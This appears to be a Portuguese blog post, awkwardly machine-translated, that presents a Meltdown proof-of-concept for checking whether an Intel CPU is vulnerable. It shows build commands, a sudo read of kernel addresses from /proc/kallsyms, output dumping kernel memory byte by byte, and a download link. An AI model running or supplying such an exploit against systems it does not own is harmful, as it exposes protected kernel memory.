Veja se sua CPU está vulnerável a Meltdown e Spectre

Image result for intel

Foi disponibilizado um exploit para ajudar a descobrir se o seu computador está vulneravel ou não a nova falha na CPUs da intel.

Detalhes sobre o funcionamento do exploit:

MELTDOWN EXPLOIT POC

As otimizações especulativas executam o código de forma não segura, deixando traços de dados em microarquitetura, como o cache.
Consulte o artigo de Lipp et. al 2017 para detalhes: https://meltdownattack.com/meltdown.pdf .
Só pode despejar linux_proc_bannerno momento, uma vez que requer a memória acessada para estar no cache e linux_proc_banneré armazenada em cache em cada leitura /proc/versionPoderia trabalhar prefetch.
Construa com make, execute com ./run.sh.
Não pode derrotar KASLR ainda, então você pode precisar digitar sua senha para encontrar linux_proc_bannerna /proc/kallsyms(ou fazê-lo manualmente).
Flush + Recarregar e abordagem de matriz de destino tirada do papel de espectro https://spectreattack.com/spectre.pdfimplementado seguindo as pistas de https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory- do modo usuário /.
A caixa de Pandora está aberta.
Resultado:
$ make
cc -O2 -msse2   -c -o meltdown.o meltdown.c
cc   meltdown.o   -o meltdown
$ ./run.sh 
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo awk 
 /linux_proc_banner/ {
  if (strtonum("0x"$1))
   print $1;
  exit 0;
 } /proc/kallsyms
+ linux_proc_banner=ffffffffa3e000a0
+ set +x
cached = 29, uncached = 271, threshold 88
read ffffffffa3e000a0 = 25 %
read ffffffffa3e000a1 = 73 s
read ffffffffa3e000a2 = 20  
read ffffffffa3e000a3 = 76 v
read ffffffffa3e000a4 = 65 e
read ffffffffa3e000a5 = 72 r
read ffffffffa3e000a6 = 73 s
read ffffffffa3e000a7 = 69 i
read ffffffffa3e000a8 = 6f o
read ffffffffa3e000a9 = 6e n
read ffffffffa3e000aa = 20  
read ffffffffa3e000ab = 25 %
read ffffffffa3e000ac = 73 s
read ffffffffa3e000ad = 20  
read ffffffffa3e000ae = 28 (
read ffffffffa3e000af = 62 b
read ffffffffa3e000b0 = 75 u
read ffffffffa3e000b1 = 69 i
read ffffffffa3e000b2 = 6c l
read ffffffffa3e000b3 = 64 d
read ffffffffa3e000b4 = 64 d
read ffffffffa3e000b5 = 40 @
VULNERABLE
VULNERABLE ON
4.10.0-42-generic #46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model  : 158
model name : Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz
stepping : 9
microcode : 0x5e
cpu MHz  : 3499.316
cache size : 6144 KB
physical id : 0

Não funciona

Se ele compila, mas falha com, Illegal instructionentão, seu hardware é muito antigo ou é uma VM. Tente compilar com:
$ make CFLAGS = -DHAVE_RDTSCP = 0 clean all

Funciona em



CLIQUE AQUI PARA BAIXAR O EXPLOIT

Comentários